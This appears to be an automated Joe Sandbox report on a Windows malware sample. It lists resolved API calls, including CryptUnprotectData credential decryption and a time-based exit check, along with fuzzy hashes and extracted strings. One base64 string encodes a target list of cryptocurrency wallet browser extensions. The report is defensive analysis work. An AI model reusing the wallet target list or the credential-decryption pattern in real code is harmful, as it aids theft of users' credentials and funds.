Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: <>^$@e$PX}o$f{7g$gI5;$MN
API String ID: 0-357754439
Opcode ID: e63fa0f0ddb9588fa286264de6e9cfd19c05b57fd50b04e0da0294b2d3b01192
Instruction ID: 154e3a89259b89673ab286be73ef9c0ef4849e6c4de202c82e222bc564dace9d
Opcode Fuzzy Hash: e63fa0f0ddb9588fa286264de6e9cfd19c05b57fd50b04e0da0294b2d3b01192
Instruction Fuzzy Hash: 42B2F7F360C6009FE308AE2DEC8567ABBE6EFD4720F16893DE6C5C3744E63558058696

Function 00349AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00344EEE,00000000,?), ref: 00349B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349B2A
LocalFree.KERNEL32(?,?,?,?,00344EEE,00000000,?), ref: 00349B3F

Strings

N4, xrefs: 00349AD4, 00349AE1, 00349AF9, 00349B18, 00349AE4, 00349B1B

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: N4
API String ID: 4291131564-2877227682
Opcode ID: c8d86198524a614e365e67a9e2ac70a8e3a1fc96c2c72a4bc366107f59e599d0
Instruction ID: 567afea89e5745b0b3eefb066b0798207c86a85a6f2e5689ecae565c07cc3599
Opcode Fuzzy Hash: c8d86198524a614e365e67a9e2ac70a8e3a1fc96c2c72a4bc366107f59e599d0
Instruction Fuzzy Hash: 60119DB4240208EFEB10CF64DC95FAA77B5EB89700F208059FE159F390C7B6A901DBA0

Function 00712AEA Relevance: 7.9, Strings: 5, Instructions: 1614COMMON

Download Yara Rule

Strings

Compressionsvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exe, xrefs: 00712C53
$x, xrefs: 00712DA8
)k, xrefs: 00712E9F
4\,v, xrefs: 00713DBF
&.K, xrefs: 00713860

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: $x$&.K$4\,v$Compressionsvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exe$)k
API String ID: 0-2777974978
Opcode ID: 9440b017c2053e05d1d58f6acba3785bc645cd612db5ce6b567481d6fd8fc6db
Instruction ID: dc22c45e3deab0a9bb426bff30e145f683e50e9f21f121096d58c89c6551377d
Opcode Fuzzy Hash: 9440b017c2053e05d1d58f6acba3785bc645cd612db5ce6b567481d6fd8fc6db
Instruction Fuzzy Hash: 46B207F3A0C214AFE3046E2DEC8567AFBE9EF94760F1A853DE6C4C3344E63558058696

Function 0070D91F Relevance: 7.9, Strings: 5, Instructions: 1604COMMON

Download Yara Rule

Strings

M}w, xrefs: 0070DEF6
<K7?, xrefs: 0070E2A9
Zo, xrefs: 0070E6A6
8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJ, xrefs: 0070DA46
2k{], xrefs: 0070E4E3

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 2k{]$8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2ZuYmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJ$<K7?$M}w$Zo
API String ID: 0-114640651
Opcode ID: 2abd443a5592c57628a1566d5947dc98e07a8080f8bcb2c645e08feea4f9428b
Instruction ID: 43470f0e0397423856e0c4e6407cbe5794164179fe079e30081768af26e64d26
Opcode Fuzzy Hash: 2abd443a5592c57628a1566d5947dc98e07a8080f8bcb2c645e08feea4f9428b
Instruction Fuzzy Hash: 74B205F3A082049FE304AE2DEC8566AFBE5EF94720F1A493DEAC4C7344E63558158797

Function 00356920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 0035696C
sscanf.NTDLL ref: 00356999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003569B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003569C0
ExitProcess.KERNEL32 ref: 003569DA

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 898174d59afdb8943682eee2f679b0da9e78d59da4f3048ec11cfe90cf8cb153
Instruction ID: 81137ec2bc5a5aa6c811636b0a3d515ef294a63a415a1306fd6d87c1210466b7
Opcode Fuzzy Hash: 898174d59afdb8943682eee2f679b0da9e78d59da4f3048ec11cfe90cf8cb153
Instruction Fuzzy Hash: 7D21EA75D10208ABDF04EFE4D945DEEB7B5BF48301F04852AE806F3250EB345609DB65

Function 00347240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400), ref: 0034724D
RtlAllocateHeap.NTDLL(00000000), ref: 00347254
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00347281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003472A4
LocalFree.KERNEL32(?), ref: 003472AE

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: b4cde7c109542132fcbc2116ad5ab3356103345614bbf965b6bd3304c66312cf
Instruction ID: 2b8e4a7125cbc6d7f52cf407a5c5edfe91f2d53dea5e17f15c8bb7a396634b91
Opcode Fuzzy Hash: b4cde7c109542132fcbc2116ad5ab3356103345614bbf965b6bd3304c66312cf
Instruction Fuzzy Hash: 78010CB5A40208BBEB14DFD4CD4AF9E77B8EB44B00F104555FB05BA2C0D6B0AA049B65

Function 00708A77 Relevance: 6.7, Strings: 4, Instructions: 1652COMMON

Download Yara Rule

Strings

Y{c, xrefs: 00709609
@[O, xrefs: 00709924
wG~o, xrefs: 00708EE1
8L3Z, xrefs: 0070952F

Memory Dump Source

Source File: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 8L3Z$wG~o$@[O$Y{c
API String ID: 0-2199994972
Opcode ID: 68590c5c55b1d324e12a4bfb9a8f9fb831df1c42ede2c830419e1ca2f24936e8
Instruction ID: 7237a5ab613499678df97077c3b0fd625a125b0a8b12b745562906e97e851ca6
Opcode Fuzzy Hash: 68590c5c55b1d324e12a4bfb9a8f9fb831df1c42ede2c830419e1ca2f24936e8
Instruction Fuzzy Hash: 0BB206F360C204AFE304AE2DEC8567ABBE9EF94320F16893DE6C4C7744E63558458697

Function 00358EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00345184,40000001,00000000,00000000,?,00345184), ref: 00358EC0

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

